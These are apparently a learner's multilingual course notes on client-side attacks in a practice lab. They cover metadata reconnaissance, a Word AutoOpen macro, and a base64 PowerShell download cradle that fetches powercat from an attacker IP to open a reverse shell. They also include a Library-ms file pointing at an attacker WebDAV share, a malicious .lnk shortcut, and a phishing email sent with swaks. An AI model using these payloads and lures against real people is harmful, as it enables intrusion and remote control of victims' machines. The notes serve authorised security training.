11. Client-side Attacks

[WDavid404]

• Target Reconnaissance
• Exploiting Microsoft Office
• Abusing Windows Library Files

[WDavid404]

Target Reconnaissance

Information Gathering

exiftool

used for reading and writing meta data in a variety of file types

exiftool a.jpg # A basic command to extract all metadata from a file named a.jpg.
exiftool -a -u brochure.pdf 
# arguments -a to display duplicated tags and -u to display unknown tags along with the filename brochure.pdf

The output further reveals that the PDF was created with Microsoft PowerPoint for Microsoft 365. This is crucial information for us to plan our client-side attack since we now know that the target uses Microsoft Office and since there is no mention of "macOS" or "for Mac" in any of the metadata tags, it's very probable that Windows was used to create this document.

Gobuster to search pdf files on a target web site

gobuster dir -u 192.168.194.197 -w /usr/share/wordlists/dirb/common.txt -t 5 -x .pdf

Client Fingerprinting

Client Fingerprinting, also known as Device Fingerprinting to obtain operating system and browser information from a target.

theHarvester

https://qiita.com/kichise/items/13d99dcb6e3e4819e0a8 OSINT（open source intelligence）ツール. ドメイン名から内包するホストやメールアドレス、名前、サブドメイン、IP、URLなどを探してくれる。 ./theHarvester.py -d apple.com -b yahoo

Canarytokens

a free web service that generates a link with an embedded token that we'll send to the target. When the target opens the link in a browser, we will get information about their browser, IP address, and operating system.

カナリアトークンは、自身に対する外部からのアクセスを検知すると、運用者にアラートを発信します。 トークンはファイルやURL（URLに埋め込まれた固有の識別子）、Web APIなどです。 重要ファイルを装ったカナリアトークンを対象システム内に設置したり、通常はアクセスできないURLをカナリアトークンとして配置したりすることで、管理者は外部からの不審なアクセスを検知することができます。 また、GitリポジトリやCI/CDパイプラインに対しても設置が可能です。

一部の攻撃者は、カナリアトークンサービスをマルウェアやランサムウェアの運用に悪用しています。 ランサムウェア攻撃者のケースでは、ランサムウェア運用者はプログラム内にトークンを埋め込むことで、被害者のシステムが暗号化されたことを素早く察知するとともに、復号鍵情報を取得することができます。

Webpage: https://canarytokens.org/generate

A map on the left side shows us the geographical location of the victim. We can click on the entry to get more information.

[WDavid404]

Exploiting Microsoft Office

Preparing the Attack、

In a majority of situations we can't just send the malicious document as an attachment. Furthermore, most anti-phishing training programs stress the danger of enabling macros in an emailed Office document.

To deliver our payload and increase the chances that the target opens the document, we could use a pretext and provide the document in another way, like a download link.

If we successfully manage to deliver the Office document to our target via email or download link, the file will be tagged with the Mark of the Web (MOTW).

A user opens an Office file containing macros obtained from the internet. For example, an email attachment. The file has Mark of the Web (MOTW). Mark of the Web only applies to files saved on an NTFS file system, not files saved to FAT32 formatted devices.

Windows uses the Mark-of-the-Web (MotW) to indicate that a file originated from the Internet, which gives Microsoft Defender SmartScreen an opportunity to perform additional inspection of the content. MotW also supplies the basis for prompting a user with an additional prompt when high-risk extensions are opened.

Office documents tagged with MOTW will open in Protected View, which disables all editing and modification settings in the document and blocks the execution of macros or embedded objects. When the victim opens the MOTW-tagged document, Office will show a warning with the option to Enable Editing.

Leveraging Microsoft Word Macros

step1. we created a VBA macro in a Word document to execute a single command when the document is opened. step2. we replaced the single command with a base64-encoded PowerShell command downloading PowerCat and starting a reverse shell on the local system.

Let's dive in and create a macro in Word. We'll create a blank Word document with mymacro as the file name and save it in the .doc format. This is important because the newer .docx file type cannot save macros without attaching a containing template. This means that we can run macros within .docx files but we can't embed or save the macro in the document.

Ref: VBA code example：lunch powershell when open the doc file

Sub AutoOpen()

  MyMacro

End Sub

Sub Document_Open()

  MyMacro

End Sub

Sub MyMacro()

  CreateObject("Wscript.Shell").Run "powershell"

End Sub

Note: VBA has a 255-character limit for literal strings and therefore, we can't just embed the base64-encoded PowerShell commands as a single string. This restriction does not apply to strings stored in variables, so we can split the commands into multiple lines (stored in strings) and concatenate them.

【Lesson】Macro要选择保存在当前文件内，并确定macro是enable的

PowerShell command string

PowerShell download cradle and PowerCat reverse shell IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell

Need to encode64 to the command string above. https://www.base64encode.org/ Note: use 'UTF-16LE'

split a base64 encoded PowerShell command string

Python script to split a base64 encoded PowerShell command string

str = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwA..."

n = 50

for i in range(0, len(str), n):
    print("Str = Str + " + '"' + str[i:i+n] + '"')

powercat

A PowerShell TCP/IP swiss army knife that works with Netcat & Ncat

[WDavid404]

Abusing Windows Library Files

Obtaining Code Execution via Windows Library Files

Windows library files are virtual containers for user content. They connect users with data stored in remote locations like web services or shares. These files have a .Library-ms file extension and can be executed by double-clicking them in Windows Explorer.

We will have two stages： In the first stage, we'll use Windows library files to gain a foothold on the target system and set up the second stage. In the second stage, we'll use the foothold to provide an executable file that will start a reverse shell when double-clicked.

we'll create a Windows library file connecting to a WebDAV share we'll set up. In the first stage, the victim receives a .Library-ms file, perhaps via email. When they double-click the file, it will appear as a regular directory in Windows Explorer. In the WebDAV directory, we'll provide a payload in the form of a .lnk shortcut file for the second stage to execute a PowerShell reverse shell. We must convince the user to double-click our .lnk payload file to execute it.

Use WsgiDAV tool as the WebDAV server to host and serve our files

kali@kali:~$ pip3 install wsgidav           
Defaulting to user installation because normal site-packages is not writeable
Collecting wsgidav
  Downloading WsgiDAV-4.0.1-py3-none-any.whl (171 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 171.3/171.3 KB 1.6 MB/s eta 0:00:00
...  
Successfully installed json5-0.9.6 wsgidav-4.0.1 

Once WsgiDAV is installed, we'll create the /home/kali/webdav directory to use as the WebDAV share that will contain our .lnk file. For now, let's place a test.txt file in this directory.

kali@kali:~$ mkdir /home/kali/webdav
kali@kali:~$ touch /home/kali/webdav/test.txt
kali@kali:~$ /home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/

On a windows PC, made a "config.Library-ms" file

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://192.168.45.159</url>  ==》我们的kali IP
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

(Note: Windows OS may change url info automatically, so we should reset the context of the file as above)

上面的文件实现了让Windows Library code for connecting to our WebDAV Share ==》双击这个config.Library-ms文件，就可以打开kali的webdav folder，从而可以把windows上的文件共享给Kali。

Create the shortcut file: The goal is to start a reverse shell by putting the .lnk shortcut file on the WebDAV share for the victim to execute.

1. Right-click on the desktop and click on New then on Shortcut. I
2. Enter the command below into the input field and click Next.

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.159:8000/powercat.ps1');powercat -c 192.168.45.159 -p 4444 -e powershell"

--》即将会从kali的8000 port里下载一个powercat.ps文件并通过执行它向kali的4444 port发送reverse shell信息

shortcut的画面如下：

Next, we'll provide the Windows library file we created to a simulated victim with a pretext. Our goal is to convince the victim to double-click the shortcut after embedding the WebDAV share via the prepared Windows library file.

理由： 为什么不直接用.link文件？因为local PC上的.link文件很容易被spam filter识别。但是，a majority of spam filters and security technologies will pass Windows library files directly to the user. When they double-click the file, Windows Explorer displays the contents of the remote location as if it were a local directory

在Kali端，发送一个phishing email to marcus@beyond.com

1. 准备一个 powercat.ps1 文件并启动httpserver，以被目标人下载

   
   kali@kali:~/beyond$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .

kali@kali:~/beyond$ python3 -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

2.  nc -nvlp 4444
3. 准备email的正文（body.txt）

Hey! I checked WEBSRV1 and discovered that the previously used staging script still exists in the Git logs. I'll remove it for security reasons.

On an unrelated note, please install the new security features on your workstation. For this, download the attached file, double-click on it, and execute the configuration shortcut within. Thanks!

John

4. 发送邮件：具体command如下 （add -ap to enable password authentication.）

kali@kali:~/beyond$ sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.45.159 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap Username: john Password: dqsTwTpZPn#nL === Trying 192.168.50.242:25... === Connected to 192.168.50.242. <- 220 MAILSRV1 ESMTP -> EHLO kali <- 250-MAILSRV1 <- 250-SIZE 20480000 <- 250-AUTH LOGIN <- 250 HELP -> AUTH LOGIN <- 334 VXNlcm5hbWU6 -> am9obg== <- 334 UGFzc3dvcmQ6 -> ZHFzVHdUcFpQbiNuTA== <- 235 authenticated. -> MAIL FROM:john@beyond.com <- 250 OK -> RCPT TO:marcus@beyond.com <- 250 OK -> DATA <- 354 OK, send. -> 36 lines sent <- 250 Queued (1.088 seconds) -> QUIT <- 221 goodbye === Connection closed with remote host.

[WDavid404]

11.3.1 Capstone practice

1. gobuster dir -u 192.168.194.197 -w /usr/share/wordlists/dirb/common.txt -t 5 -x .pdf,txt
2. 下载pdf文件，利用exiftool工具找到Auth信息（dave wizard）
3. 给Auth发邮件 sudo swaks -t dave.wizard@supermagicorg.com --from test@supermagicorg.com -ap --attach config.Library-ms --server 192.168.208.199 --body body.txt --header "Subject: Problems" --suppress-data